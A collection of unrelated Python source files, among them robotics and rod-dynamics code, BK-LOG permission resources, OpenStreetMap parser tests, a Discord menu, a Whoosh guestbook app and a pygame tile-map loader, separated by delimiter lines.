randint(self.min_kernel_size[1] // 2,
self.max_kernel_size[1] // 2) * 2 + 1
), border_type=self.border_type)(img)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""ROS-RBDL simulator
This 'simulator' is not per se a simulator, it communicates with the real robots in the real world using ROS [1], and
computes any necessary kinematic and dynamics information using the RBDL library [2].
Specifically, this 'simulator' starts the `roscore` (if not already running), then loads robot urdf models and creates
the necessary topics/services, and uses the rigid body dynamics library to compute kinematic and dynamic information
about the model.
Dependencies in PRL:
* `pyrobolearn.simulators.simulator.Simulator`
References:
[1] ROS: http://www.ros.org/
[2] RBDL: https://rbdl.bitbucket.io/
"""
# TODO
import rospy
import rbdl
from pyrobolearn.simulators.simulator import Simulator
__author__ = "Brian Delhaisse"
__copyright__ = "Copyright 2018, PyRoboLearn"
__credits__ = ["Brian Delhaisse"]
__license__ = "GNU GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Brian Delhaisse"
__email__ = "briandelhaisse@gmail.com"
__status__ = "Development"
class RBDL_ROS(Simulator):
r"""RBDL-ROS Interface.
References:
[1] ROS: http://www.ros.org/
[2] RBDL: https://rbdl.bitbucket.io/
[3] RBDL in Python: https://rbdl.bitbucket.io/dd/dee/_python_example.html
"""
def __init__(self, **kwargs):
super(RBDL_ROS, self).__init__(render=False)
raise NotImplementedError
def step(self, sleep_time=0):
"""Perform a step in the simulator, and sleep the specified amount of time.
Args:
sleep_time (float): amount of time to sleep after performing one step in the simulation.
"""
pass
def load_urdf(self, filename, position, orientation):
# load the model in rbdl
model = rbdl.loadModel(filename)
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
We undertake not to change the open source license (MIT license) applicable to the current version of
the project delivered to anyone in the future.
"""
import abc
from typing import List
from django.conf import settings
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy as _lazy
from apps.api import TransferApi
from apps.iam.exceptions import ResourceNotExistError
from iam import Resource
class ResourceMeta(metaclass=abc.ABCMeta):
"""
资源定义
"""
system_id: str = ""
id: str = ""
name: str = ""
selection_mode: str = ""
related_instance_selections: List = ""
@classmethod
def to_json(cls):
return {
"system_id": cls.system_id,
"id": cls.id,
"selection_mode": cls.selection_mode,
"related_instance_selections": cls.related_instance_selections,
}
@classmethod
def create_simple_instance(cls, instance_id: str, attribute=None) -> Resource:
"""
创建简单资源实例
:param instance_id: 实例ID
:param attribute: 属性kv对
"""
attribute = attribute or {}
if "bk_biz_id" in attribute:
# 补充路径信息
attribute.update({"_bk_iam_path_": "/{},{}/".format(Business.id, attribute["bk_biz_id"])})
return Resource(cls.system_id, cls.id, str(instance_id), attribute)
@classmethod
def create_instance(cls, instance_id: str, attribute=None) -> Resource:
"""
创建资源实例(带实例名称)可由子类重载
:param instance_id: 实例ID
:param attribute: 属性kv对
"""
return cls.create_simple_instance(instance_id, attribute)
class Business(ResourceMeta):
"""
CMDB业务
"""
system_id = "bk_cmdb"
id = "biz"
name = _lazy("业务")
selection_mode = "instance"
related_instance_selections = [{"system_id": system_id, "id": "business"}]
@classmethod
def create_instance(cls, instance_id: str, attribute=None) -> Resource:
from apps.log_search.models import ProjectInfo
resource = cls.create_simple_instance(instance_id, attribute)
bk_biz_name = str(instance_id)
business = ProjectInfo.objects.filter(bk_biz_id=instance_id).first()
if business:
bk_biz_name = business.project_name
resource.attribute = {"id": str(instance_id), "name": bk_biz_name}
return resource
class Collection(ResourceMeta):
system_id = settings.BK_IAM_SYSTEM_ID
id = "collection"
name = _lazy("采集项")
selection_mode = "instance"
related_instance_selections = [{"system_id": system_id, "id": "collection_list"}]
@classmethod
def create_simple_instance(cls, instance_id: str, attribute=None) -> Resource:
from apps.log_databus.models import CollectorConfig
resource = super().create_simple_instance(instance_id, attribute)
if resource.attribute:
return resource
try:
config = CollectorConfig.objects.get(pk=instance_id)
except CollectorConfig.DoesNotExist:
return resource
resource.attribute = {
"id": str(instance_id),
"name": config.collector_config_name,
"bk_biz_id": config.bk_biz_id,
"_bk_iam_path_": "/{},{}/".format(Business.id, config.bk_biz_id),
}
return resource
class EsSource(ResourceMeta):
system_id = settings.BK_IAM_SYSTEM_ID
id = "es_source"
name = _lazy("ES源")
selection_mode = "instance"
related_instance_selections = [{"system_id": system_id, "id": "es_source_list"}]
@classmethod
def create_simple_instance(cls, instance_id: str, attribute=None) -> Resource:
resource = super().create_simple_instance(instance_id, attribute)
if resource.attribute:
return resource
try:
result = TransferApi.get_cluster_info({"cluster_id": instance_id})
if not result:
return resource
cluster_info = result[0]
name = cluster_info["cluster_config"]["cluster_name"]
bk_biz_id = cluster_info["cluster_config"]["custom_option"].get("bk_biz_id", 0)
except Exception: # pylint: disable=broad-except
return resource
resource.attribute = {
"id": str(instance_id),
"name": name,
"bk_biz_id": bk_biz_id,
"_bk_iam_path_": "/{},{}/".format(Business.id, bk_biz_id),
}
return resource
class Indices(ResourceMeta):
system_id = settings.BK_IAM_SYSTEM_ID
id = "indices"
name = _lazy("索引集")
selection_mode = "instance"
related_instance_selections = [{"system_id": system_id, "id": "indices_list"}]
@classmethod
def create_simple_instance(cls, instance_id: str, attribute=None) -> Resource:
from apps.log_search.models import LogIndexSet, ProjectInfo
resource = super().create_simple_instance(instance_id, attribute)
if resource.attribute:
return resource
try:
index_set = LogIndexSet.objects.get(pk=instance_id)
project = ProjectInfo.objects.get(pk=index_set.project_id)
except (LogIndexSet.DoesNotExist, ProjectInfo.DoesNotExist):
return resource
resource.attribute = {
"id": str(instance_id),
"name": index_set.index_set_name,
"bk_biz_id": project.bk_biz_id,
"_bk_iam_path_": "/{},{}/".format(Business.id, project.bk_biz_id),
}
return resource
class ResourceEnum:
"""
资源类型枚举
"""
BUSINESS = Business
COLLECTION = Collection
ES_SOURCE = EsSource
INDICES = Indices
_all_resources = {resource.id: resource for resource in ResourceEnum.__dict__.values() if hasattr(resource, "id")}
def get_resource_by_id(resource_id: str) -> ResourceMeta:
"""
根据资源ID获取资源
"""
if resource_id not in _all_resources:
raise ResourceNotExistError(_("资源ID不存在:{resource_id}").format(resource_id=resource_id))
return _all_resources[resource_id]
|
import numpy as np
from scipy.optimize import fsolve
from scipy.linalg import expm
import matplotlib.pyplot as plt
# Some utilities
# map a vector to a skew symmetric matrix
def skew(x):
return np.array([[0, -x[2], x[1]], [x[2], 0, -x[0]], [-x[1], x[0], 0]])
# map a twist to its adjoint form
def adjoint(x):
return np.concatenate(
[np.concatenate([skew(x[:3]), np.zeros((3, 3))], 1), np.concatenate([skew(x[3:]), skew(x[:3])], 1)])
# flatten a homogeneous transformation matrix to a vector
def flatten(g):
return np.concatenate([np.reshape(g[:3, :3], (9,)), g[:3, 3]])
# unflatten a homogeneous transformation
def unflatten(g):
return np.row_stack((np.column_stack((np.reshape(g[:9], (3, 3)), g[9:])), np.array([0, 0, 0, 1])))
# the matrix representation of a twist vector
def se(x):
return np.row_stack((np.column_stack((skew(x[:3]), x[3:])), np.array([0, 0, 0, 0])))
# Initialization
def initRod(N):
L = 10e-2 # length of the rod
g = np.zeros((N, 12))
xi = np.repeat(np.array([[0, np.pi/4/L, 0, 0, 0, 1]]), N, 0)
eta = np.zeros((N, 6))
#explicit Euler RKMK
G = np.eye(4)
ds = L / (N - 1)
g[0, :] = flatten(G)
for i in range(1, N):
G = G @ expm(se(ds * xi[i - 1, :]))
g[i, :] = flatten(G)
return g, xi, eta
#Integration
def step(g, xi, eta):
# determine xi0 by solving tip condition
xi0 = fsolve(lambda x: condition(g, xi, eta, x), xi[0, :])
# integrate the system with the solved xi0
return integrate(g, xi, eta, xi0)
def condition(g, xi, eta, xi0):
g_next, xi_next, eta_next = integrate(g, xi, eta, xi0)
return xi_next[-1, :] - np.array([0, 0, 0, 0, 0, 1])
def integrate(g, xi, eta, xi0):
# initialize empty matrices for storage
g_next = np.zeros_like(g)
xi_next = np.zeros_like(xi)
eta_next = np.zeros_like(eta)
# determine number of spatial points, just believe everything is the right size
(N, _) = xi.shape
# set the guessed value
xi_next[0, :] = xi0
# material and geometric properties
xi_ref = np.array([0, 0, 0, 0, 0, 1])
L = 10e-2
D = 1e-2
E = 1e6
rho = 1e3
ds = L / (N - 1)
dt = 0.01
A = np.pi / 4 * D ** 2
I = np.pi / 64 * D ** 4
J = 2 * I
G = E / 3
K = np.diag([E * I, E * I, G * J, G * A, G * A, E * A])
M = rho * np.diag([I, I, J, A, A, A])
# integration over the body (don't need the initial point as the initial values are determined already)
for i in range(N - 1):
# averaging over steps to get half step values
xi_half = (xi_next[i, :] + xi[i, :]) / 2
eta_half = (eta_next[i, :] + eta[i, :]) / 2
# implicit midpoint approximation
xi_dot = (xi_next[i, :] - xi[i, :]) / dt
eta_dot = (eta_next[i, :] - eta[i, :]) / dt
# spatial derivatives
xi_der = np.linalg.inv(K) @ (
(M @ eta_dot) - (adjoint(eta_half).T @ M @ eta_half) + (adjoint(xi_half).T @ K @ (xi_half - xi_ref)))
eta_der = xi_dot - (adjoint(xi_half) @ eta_half)
# explicit Euler step
xi_half_next = xi_half + ds * xi_der
eta_half_next = eta_half + ds * eta_der
# determine next step from half step value
xi_next[i + 1, :] = 2 * xi_half_next - xi[i+1, :]
eta_next[i + 1, :] = 2 * eta_half_next - eta[i+1, :]
# midpoint RKMK to step the g values
for i in range(N):
g_next[i, :] = flatten(unflatten(g[i,:]) @ expm(se(dt * (eta_next[i,:] + eta[i,:])/2)))
return g_next, xi_next, eta_next
# Testing functions
def plotDynamics(N, steps):
# start figure
fig, ax = plt.subplots()
g, xi, eta = initRod(N)
ax.plot(g[:,9], g[:,11])
ax.set_aspect('equal')
plt.pause(0.01) # make the plots show up as they're updated
for i in range(steps):
g, xi, eta = step(g, xi, eta)
ax.plot(g[:,9], g[:,11])
plt.pause(0.01) # make the plots show up as they're updated
#make sure it stays open for looking at and saving
plt.show()
def energy(xi,eta):
# similar to the setup for the integrator
(N, _) = xi.shape
xi_ref = np.array([0, 0, 0, 0, 0, 1])
L = 10e-2
D = 1e-2
E = 1e6
rho = 1e3
ds = L / (N - 1)
dt = 0.01
A = np.pi / 4 * D ** 2
I = np.pi / 64 * D ** 4
J = 2 * I
G = E / 3
K = np.diag([E * I, E * I, G * J, G * A, G * A, E * A])
M = rho * np.diag([I, I, J, A, A, A])
H = 0 # total energy
# integrate over the rod
for i in range(N):
T = eta[i,:].T @ M @ eta[i,:]
U = (xi[i,:]-xi_ref).T @ K @ (xi[i,:]-xi_ref)
H += 1/2*(T + U)
return ds*H #multiply by discrete step size to scale
def plotEnergy(N, steps):
fig, ax = plt.subplots()
g, xi, eta = initRod(N)
E = []
for i in range(steps):
g, xi, eta = step(g, xi, eta)
E.append(energy(xi,eta))
ax.plot(E)
plt.show()
# Call the script as python conservative.py
if __name__ == "__main__":
# plotDynamics(100, 20)
plotEnergy(100,100) |
import pytest
import os
import datetime
import osmdigest.detail as detail
def test_OSMElement():
el = detail.OSMElement("tag", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632", "user":"SvenHRO",
"uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z"})
assert( el.osm_id == 298884269 )
assert( el.name == "tag" )
assert( el.subobjs == [] )
assert( el.keys == {"lon", "lat"} )
assert( el.metadata == {"user":"SvenHRO", "uid":46882, "version":1, "changeset":676636,
"timestamp": datetime.datetime(2008,9,21,21,37,45)} )
def test_OSMElement_user_optional():
el = detail.OSMElement("tag", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632",
"visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z"})
assert( el.metadata == {"user":"", "uid":0, "version":1, "changeset":676636,
"timestamp": datetime.datetime(2008,9,21,21,37,45)} )
def test_OSMElement_must_be_visible():
with pytest.raises(ValueError):
detail.OSMElement("tag", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632",
"visible":"false", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z"})
def test_OSMElement_other_parse_error():
with pytest.raises(ValueError):
detail.OSMElement("tag", {"id":"2988sgjaf84269", "lat":"54.0901746", "lon":"12.2482632",
"visible":"false", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z"})
def test_Node():
el = detail.Node("node", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632", "user":"SvenHRO",
"uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z"})
assert(el.latitude == pytest.approx(54.0901746))
assert(el.longitude == pytest.approx(12.2482632))
assert( str(el) == "Node(298884269 @ [54.0901746,12.2482632])" )
def test_Node_must_be_correct_name():
with pytest.raises(ValueError):
detail.Node("tag", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632", "user":"SvenHRO",
"uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z"})
def test_Node_mustnt_have_extra_attributes():
with pytest.raises(ValueError):
detail.Node("tag", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632", "user":"SvenHRO",
"uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z", "extra":"dave"})
def test_Way():
el = detail.Way("way", {"id":"298884269", "user":"SvenHRO",
"uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z"})
assert( str(el) == "Way(298884269,[])" )
def test_Way_wrong_name():
with pytest.raises(ValueError):
detail.Way("way2", {"id":"298884269", "user":"SvenHRO",
"uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z"})
def test_Way_extra_attribute():
with pytest.raises(ValueError):
detail.Way("way", {"id":"298884269", "user":"SvenHRO",
"uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z", "extra":"5"})
def test_Relation():
el = detail.Relation("relation", {"id":"298884269", "user":"SvenHRO",
"uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z"})
assert( str(el) == "Relation(298884269,[])" )
def test_Relation_wrong_name():
with pytest.raises(ValueError):
detail.Relation("relation2", {"id":"298884269", "user":"SvenHRO",
"uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z"})
def test_Relation_extra_attribute():
with pytest.raises(ValueError):
detail.Relation("relation", {"id":"298884269", "user":"SvenHRO",
"uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
"timestamp":"2008-09-21T21:37:45Z", "extra":"5"})
def test_Bounds():
el = detail.Bounds("bounds", {"minlat":"54.0889580", "minlon":"12.2487570", "maxlat":"54.0913900", "maxlon":"12.2524800"})
assert(el.min_latitude == pytest.approx(54.0889580))
assert(el.min_longitude == pytest.approx(12.2487570))
assert(el.max_latitude == pytest.approx(54.0913900))
assert(el.max_longitude == pytest.approx(12.2524800))
def test_Bounds_parse_failures():
try:
detail.Bounds("bounds2", {"minlat":"54.0889580", "minlon":"12.2487570", "maxlat":"54.0913900", "maxlon":"12.2524800"})
except ValueError as ex:
assert(str(ex) == "Should be of type 'bounds'")
try:
detail.Bounds("bounds", {"extra":"5", "minlat":"54.0889580", "minlon":"12.2487570", "maxlat":"54.0913900", "maxlon":"12.2524800"})
except ValueError as ex:
assert(str(ex) == "Unexpected extra attributes for 'bounds' element: {'extra'}")
def test_Tag():
el = detail.Tag("tag", {"k": "traffic_sign", "v": "city_limit"})
assert(el.key == "traffic_sign")
assert(el.value == "city_limit")
assert(str(el) == "Tag(traffic_sign->city_limit)")
def test_Tag_parse_failures():
try:
detail.Tag("tag2", {"k": "traffic_sign", "v": "city_limit"})
except ValueError as ex:
assert(str(ex) == "Should be of type 'tag'")
try:
detail.Tag("tag", {"extra":"bob", "k": "traffic_sign", "v": "city_limit"})
except ValueError as ex:
assert(str(ex) == "Unexpected extra attributes for 'tag' element: {'extra'}")
def test_NodeRef():
el = detail.NodeRef("nd", {"ref": "292403538"})
assert(el.ref == 292403538)
assert(str(el) == "NodeRef(292403538)")
def test_NodeRef_parse_failures():
try:
detail.NodeRef("nd2", {"ref": "292403538"})
except ValueError as ex:
assert(str(ex) == "Should be of type 'nd'")
try:
detail.NodeRef("nd", {"extra": "292403538"})
except ValueError as ex:
assert(str(ex) == "Unexpected extra attributes for 'nd' element: {'extra'}")
def test_Member():
el = detail.Member("member", {"type":"node", "ref":"294942404", "role":""})
assert(el.type == "node")
assert(el.ref == 294942404)
assert(el.role == "")
with pytest.raises(ValueError):
detail.Member("member2", {"type":"node", "ref":"294942404", "role":""})
with pytest.raises(ValueError):
detail.Member("member", {"extra":"jegw", "type":"node", "ref":"294942404", "role":""})
def test_OSM():
el = detail.OSM("osm", {"version":"0.6", "generator":"CGImap 0.0.2"})
assert(el.version == "0.6")
assert(el.generator == "CGImap 0.0.2")
assert(el.timestamp is None)
el = detail.OSM("osm", {"version":"0.6", "generator":"osmconvert 0.8.5", "timestamp":"2017-04-25T20:43:28Z"})
assert(el.version == "0.6")
assert(el.generator == "osmconvert 0.8.5")
assert(el.timestamp == datetime.datetime(2017,4,25,20,43,28))
def check_example_output(out):
assert(isinstance(out[0], detail.OSM))
assert(isinstance(out[1], detail.Bounds))
assert(out[2].osm_id == 298884269)
assert(out[2].longitude == pytest.approx(12.2482632))
assert(out[2].latitude == pytest.approx(54.0901746))
assert(isinstance(out[3], detail.Node))
assert(out[4].osm_id == 1831881213)
assert(out[4].subobjs[0].key == "name")
assert(out[4].subobjs[0].value == "Neu Broderstorf")
assert(str(out[4].subobjs[1]) == "Tag(traffic_sign->city_limit)")
assert(isinstance(out[5], detail.Node))
assert(out[6].osm_id == 26659127)
assert(out[6].subobjs[0].ref == 292403538)
assert(str(out[6].subobjs[3]) == "Tag(highway->unclassified)")
assert(str(out[6].subobjs[4]) == "Tag(name->Pastower Straße)")
assert(out[7].osm_id == 56688)
assert(out[7].subobjs[0].ref == 294942404)
assert(out[7].subobjs[2].type == "way")
assert(str(out[7].subobjs[4]) == "Tag(name->Küstenbus Linie 123)")
assert(len(out[7].subobjs) == 10)
assert(len(out) == 8)
def test_example():
with detail.Parser(os.path.join("tests", "example.osm")) as parser:
out = list(parser)
check_example_output(out)
def test_example_xz():
with detail.Parser(os.path.join("tests", "example.osm.xz")) as parser:
out = list(parser)
check_example_output(out)
def test_example_gz():
with detail.Parser(os.path.join("tests", "example.osm.gz")) as parser:
out = list(parser)
check_example_output(out)
def test_example_bz2():
with detail.Parser(os.path.join("tests", "example.osm.bz2")) as parser:
out = list(parser)
check_example_output(out) |
import json
from typing import Dict, List, Optional, Union
from redbot.core.utils.chat_formatting import text_to_file
from redbot.vendored.discord.ext import menus
from .typehint import UserInfosResult
class MembersPage(menus.ListPageSource):
def __init__(self, data, *, json: Optional[List[dict]] = None):
self.__cache_edit: Dict[int, bool] = {}
self.__was_initialized: bool = False
self.__json: Optional[Dict[str, Union[List[dict], str]]] = json
super().__init__(data, per_page=1)
async def format_page(self, menu: menus.MenuPages, entry: UserInfosResult):
if menu.current_page not in self.__cache_edit:
foot_but_not_the_sport_just_the_footer = entry["embed"].footer
entry["embed"].set_footer(
text=foot_but_not_the_sport_just_the_footer.text
+ f"\nPage {menu.current_page + 1}/{self.get_max_pages()}",
icon_url=foot_but_not_the_sport_just_the_footer.icon_url,
)
self.__cache_edit[menu.current_page] = True
if self.__was_initialized:
return {"content": entry["content"], "embed": entry["embed"]}
try:
if self.__json:
return {
"content": entry["content"],
"embed": entry["embed"],
"file": text_to_file(self.__json["data"], filename=self.__json["filename"]),
}
else:
return {"content": entry["content"], "embed": entry["embed"], "file": None}
finally:
self.__was_initialized = True
|
#! /usr/bin/python3
import os
os.system("wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=140d4U-YJs7pnSYQ3Q1nEIX5NKbUNz-ze' -O mit_voting.csv") |
#!/usr/bin/env python
import os
from flask_script import Manager
from server import create_app
app = create_app(os.environ.get('CONFIG') or 'default')
manager = Manager(app)
if __name__ == '__main__':
manager.run()
|
from typing import Dict
from typing import List
import pytest
from pytest_aiomoto.aws_lambda import aws_lambda_src
from pytest_aiomoto.aws_lambda import aws_lambda_zip
from pytest_aiomoto.aws_lambda import lambda_handler
def test_lambda_handler_echo():
event = {"i": 0}
result = lambda_handler(event=event, context={})
assert isinstance(result, Dict)
assert result['statusCode'] == 200
body = result['body']
assert body == event
def test_lambda_handler_too_large():
event = {"action": "too-large"}
result = lambda_handler(event=event, context={})
assert isinstance(result, Dict)
assert result['statusCode'] == 200
body = result['body']
assert body
assert isinstance(body, List)
assert isinstance(body[0], str)
assert body[0] == "xxx"
assert len(body) == 1000000
def test_lambda_handler_raises():
event = {"action": "runtime-error"}
with pytest.raises(RuntimeError):
lambda_handler(event=event, context={})
def test_aws_lambda_src():
lambda_src = aws_lambda_src()
assert isinstance(lambda_src, str)
assert 'def lambda_handler' in lambda_src
def test_aws_lambda_zip():
lambda_zip = aws_lambda_zip()
assert isinstance(lambda_zip, bytes)
|
import cgi
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from whoosh import store
from whoosh.fields import Schema, STORED, ID, KEYWORD, TEXT
from whoosh.index import getdatastoreindex
from whoosh.qparser import QueryParser, MultifieldParser
import logging
SEARCHSCHEMA = Schema(content=TEXT(stored=True))
class MainPage(webapp.RequestHandler):
def get(self):
self.response.out.write('<html><body>')
self.response.out.write("""
<form action="/search" method="get">
<div><input name="query" type="text" value=""><input type="submit" value="Search"></div>
</form>
</body>
</html>""")
# Write the submission form and the footer of the page
self.response.out.write("""
<form action="/sign" method="post">
<div><textarea name="content" rows="3" cols="60"></textarea></div>
<div><input type="submit" value="Sign Guestbook"></div>
</form>
</body>
</html>""")
class SearchPage(webapp.RequestHandler):
def get(self):
self.response.out.write('<html><body>')
self.response.out.write("""
<form action="/search" method="get">
<div><input name="query" type="text" value=""><input type="submit" value="Search"></div>
</form>
</body>
</html>""")
ix = getdatastoreindex("hello", schema=SEARCHSCHEMA)
parser = QueryParser("content", schema = ix.schema)
q = parser.parse(self.request.get('query'))
results = ix.searcher().search(q)
for result in results:
self.response.out.write('<blockquote>%s</blockquote>' %
cgi.escape(result['content']))
# Write the submission form and the footer of the page
self.response.out.write("""
<form action="/sign" method="post">
<div><textarea name="content" rows="3" cols="60"></textarea></div>
<div><input type="submit" value="Sign Guestbook"></div>
</form>
</body>
</html>""")
class Guestbook(webapp.RequestHandler):
def post(self):
ix = getdatastoreindex("hello", schema=SEARCHSCHEMA)
writer = ix.writer()
writer.add_document(content=u"%s" % self.request.get('content'))
writer.commit()
self.redirect('/')
application = webapp.WSGIApplication(
[('/', MainPage),
('/search', SearchPage),
('/sign', Guestbook)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
|
import requests
import itertools
import configparser
import os
config = configparser.ConfigParser()
config.read(os.environ['PARACHUTE_CONFIG_FILE'])
HOST = config['tests']['host']
PORT = config['tests']['port']
ADDRESS = 'http://{}:{}'.format(HOST, PORT)
API_ROUTE = config['routes']['api']
USER_API_KEY = config['tests']['small_user_api_key']
id_generator = itertools.count()
def test_export():
params = dict(
id=next(id_generator),
jsonrpc='2.0',
method='export_credit_history',
params=dict(
v='2.0',
api_key=USER_API_KEY
)
)
response = requests.post(ADDRESS + API_ROUTE + '?format=jsonrpc',
json=params)
print('Headers are', response.headers)
file = 'export.xlsx'
with open(file, mode='wb') as f:
for chunk in response.iter_content():
f.write(chunk)
if __name__ == '__main__':
test_export()
|
__author__ = ["Francisco Clavero"]
__email__ = ["fcoclavero32@gmail.com"]
__status__ = "Prototype"
from nltk import word_tokenize
def remove_stopwords_set(sentence, stop_words):
"""
Transforms a given text to its lemmatized form. Assumes clean text separated by spaces.
:param sentence: the text from which stopwords will be removed
:type: str
:param stop_words: a set with stop words for the same language as the sentence
:type: str
:return: lemmatized text
:type: str
"""
return ' '.join([w for w in word_tokenize(sentence) if not w in stop_words])
|
"Memoization to the rescue"
'''
Memoization is a technique in which you store the results of computational tasks when
they are completed so that when you need them again, you can look them up instead
of needing to compute them a second (or millionth) time.
'''
from typing import Dict
memo: Dict[int, int] = {0: 0, 1: 1} # our base cases
def fib3(n: int) -> int:
if n not in memo:
memo[n] = fib3(n-1) + fib3(n-2) # memoization
return memo[n]
if __name__ == "__main__":
print(fib3(5))
print(fib3(50))
""""
A call to fib3(20) will result in just 39 calls of fib3() as opposed to the 21,891 of
fib2() resulting from the call fib2(20). memo is prefilled with the earlier base cases of
0 and 1, saving fib3() from the complexity of another if statement.
"""
|
class Solution:
def canJump(self, nums: List[int]) -> bool:
|
from .plotter import Plotter
from .evaluator import Evaluator
__all__ = [
'Plotter',
'Evaluator',
]
|
import pygame as pg
import json as js
n = 32
m = 26
Ancho = n*32
Alto = m*32
class Colisionable(pg.sprite.Sprite):
def __init__(self, img, x, y):
pg.sprite.Sprite.__init__(self)
self.image = img
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
class Otros(pg.sprite.Sprite):
def __init__(self, img, x, y):
pg.sprite.Sprite.__init__(self)
self.image = img
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
class Mapa(object):
def __init__(self, archivo):
with open(archivo) as J_archivo:
self.base = js.load(J_archivo)
self.lsOtros2 = []
self.lsOtros = []
self.lsDetail = []
self.lsCosasC = []
self.lsCosasNC = []
self.lsRuinas = []
self.lsSuelo = []
for i in self.base['layers']:
if i['name'] == 'Otros 2':
self.lsOtros2 = i['data']
if i['name'] == 'Otros':
self.lsOtros = i['data']
if i['name'] == 'Detalles (encima)':
self.lsDetail = i['data']
if i['name'] == 'Otras Cosas C':
self.lsCosasC = i['data']
if i['name'] == 'Otras Cosas NC':
self.lsCosasNC = i['data']
if i['name'] == 'Ruinas Col':
self.lsRuinas = i['data']
if i['name'] == 'Suelo':
self.lsSuelo = i['data']
self.AnchoF = self.base['width']
self.AltoF = self.base['height']
self.lyOtros2 = self.Separar(self.lsOtros2, self.AnchoF)
self.lyOtros = self.Separar(self.lsOtros, self.AnchoF)
self.lyDetail = self.Separar(self.lsDetail, self.AnchoF)
self.lyCosasC = self.Separar(self.lsCosasC, self.AnchoF)
self.lyCosasNC = self.Separar(self.lsCosasNC, self.AnchoF)
self.lyRuinas = self.Separar(self.lsRuinas, self.AnchoF)
self.lySuelo = self.Separar(self.lsSuelo, self.AnchoF)
self.lstiles = self.Tiles()
def Mapeo(self, Colisionables, NoColisionables):
nf = 0
for f in self.lyOtros2:
ne = 0
for e in f:
if e != 0:
img = self.lstiles[e]
Col = Otros(img, nf, ne)
NoColisionables.add(Col)
ne += 32
nf += 32
nf = 0
for f in self.lyOtros:
ne = 0
for e in f:
if e != 0:
img = self.lstiles[e-1]
Col = Otros(img, nf, ne)
NoColisionables.add(Col)
ne += 32
nf += 32
nf = 0
for f in self.lyDetail:
ne = 0
for e in f:
if e != 0:
img = self.lstiles[e-1]
Col = Otros(img, nf, ne)
NoColisionables.add(Col)
ne += 32
nf += 32
nf = 0
for f in self.lyCosasC:
ne = 0
for e in f:
if e != 0:
img = self.lstiles[e-1]
Col = Colisionables(img, nf, ne)
Colisionables.add(Col)
ne += 32
nf += 32
nf = 0
for f in self.lyCosasNC:
ne = 0
for e in f:
if e != 0:
img = self.lstiles[e-1]
Col = Otros(img, nf, ne)
NoColisionables.add(Col)
ne += 32
nf += 32
nf = 0
for f in self.lyRuinas:
ne = 0
for e in f:
if e != 0:
img = self.lstiles[e-1]
Col = Colisionable(img, nf, ne)
Colisionables.add(Col)
ne += 32
nf += 32
nf = 0
for f in self.lySuelo:
ne = 0
for e in f:
if e != 0:
img = self.lstiles[e-1]
Col = Otros(img, nf, ne)
NoColisionables.add(Col)
ne += 32
nf += 32
def Tiles(self):
l = []
for i in self.base['tilesets']:
arc = i['image']
lr = Recortar(arc, 32, 64)
for t in lr:
l.append(t)
return l
def Separar(self, lista, ancho):
cont = 0
m = []
linea = []
for i in lista:
linea.append(i)
cont+=1
if cont == ancho:
m.append(linea)
linea = []
cont = 0
return m
def Recortar(archivo, an,al):
fondo = pg.image.load(archivo).convert_alpha()
info=fondo.get_size()
img_ancho=info[0]
img_alto=info[1]
corte_x=img_ancho/an
corte_y=img_alto/al
m=[]
for i in range(an):
fila=[]
for j in range(al):
cuadro=[i*corte_x,j*corte_y,corte_x,corte_y]
recorte = fondo.subsurface(cuadro)
fila.append(recorte)
m.append(fila)
return m
if __name__ == '__main__':
pg. init()
Pantalla = pg.display.set_mode([Ancho, Alto])
Colisionables = pg.sprite.Group()
